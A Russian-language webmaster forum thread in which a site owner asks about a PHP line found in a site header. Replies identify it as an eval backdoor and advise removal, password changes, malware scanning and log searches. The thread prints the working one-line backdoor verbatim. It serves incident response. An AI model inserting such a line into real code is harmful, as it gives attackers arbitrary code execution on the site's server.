Помогите понять простую строчку на PHP.

12 3
Erick Flatcher
На сайте с 05.02.2002
Offline
216
1593

<?php if (isset($_REQUEST['qqq'])) eval ($_REQUEST['qqq']);?>

нашел на одном из сайтов в хэдере.

Беда в том, что я не помню, что бы это туда вставлял. Не так давно возился со всплывающим меню для сайта и пробовал различные методы на php и js, может это оттуда взялось и я просто забыл почистить? В PHP ничего не понимаю.

Спасибо.

W
На сайте с 02.10.2014
Offline
8
#1

Если любым способом (GET, POST, COOKIE) передан параметр с названием qqq, то он берет значение этого поля и выполняет, что же там передается.

Т.е. с помощью данного кода на Вашем сайте можно выполнить любой код. Начать изучать можно отсюда: http://php.net/manual/ru/reserved.variables.request.php

Erick Flatcher
На сайте с 05.02.2002
Offline
216
#2

Похоже у меня проблемы. Что теперь делать?

paveldvlip
На сайте с 16.01.2007
Offline
155
#3

Вирусняк вставил бекдор.

TopSite () - программа определения позиций сайта, массовой проверки всех видов частотности, сбора позиций конкурентов и кластеризации запросов. HTML-отчёты.
KB
На сайте с 10.08.2006
Offline
164
KGB
#4
Erick Flatcher:
Похоже у меня проблемы. Что теперь делать?

да нет проблем, удалите его.

Erick Flatcher
На сайте с 05.02.2002
Offline
216
#5
paveldvlip:
Вирусняк вставил бекдор.
KGB:
да нет проблем, удалите его.

Хотелось бы понять, как это произошло. Где еще на сервере покопать и что поискать?

Спасибо.

paveldvlip
На сайте с 16.01.2007
Offline
155
#6

Сначала проверить нужно ваш компьютер на вирусы, затем сменить пароль от фтп, а уже потом удалять пакость. И проверить через пару дней, не появилось ли снова.

V
На сайте с 05.05.2014
Offline
3
#7

Поройся в логах сервера где был запрос на любой твой сайт с параметром qqq. Возьми этот ip и посмотри по истории подключений через ftp и ssh.

Дальше посмотри этот ip в логах запросов на другие свои сайты, скорее всего какой-то open source проект пробили на твоем серваке.

W
На сайте с 02.10.2014
Offline
8
#8

Можно проверить сайт и сервер хотя бы начиная с таких скриптов:

http://revisium.com/ai/

http://cbl.abuseat.org/findbot.pl

https://www.rfxn.com/projects/linux-malware-detect/

И все в таком духе.

---------- Добавлено 06.10.2014 в 02:00 ----------

viperwpadd, если долбили POST запросами, то он не узнает, когда и кто передавал qqq поле.

Только если GET'ом.

grep qqq /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n

Так увидишь все IP адреса и количество запросов с параметром qqq к твоему веб серверу (если nginx).

Ну и так же можно потом сделать grep IP.IP.IP.IP /var/log/nginx/access.log узнаешь, куда еще обращался злодей. Возможно еще зараженные файлы найдешь.

Erick Flatcher
На сайте с 05.02.2002
Offline
216
#9

Нашел на FTP PHP-файл с шеллом. :(

Поменял пароль на FTP, но думаю, что это попало туда не таким образом. Как еще оно могло там оказаться? Вирусы на компьютерах не водятся, тщательно за этим слежу.

W
На сайте с 02.10.2014
Offline
8
#10

Через уязвимости в вашем сайте.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий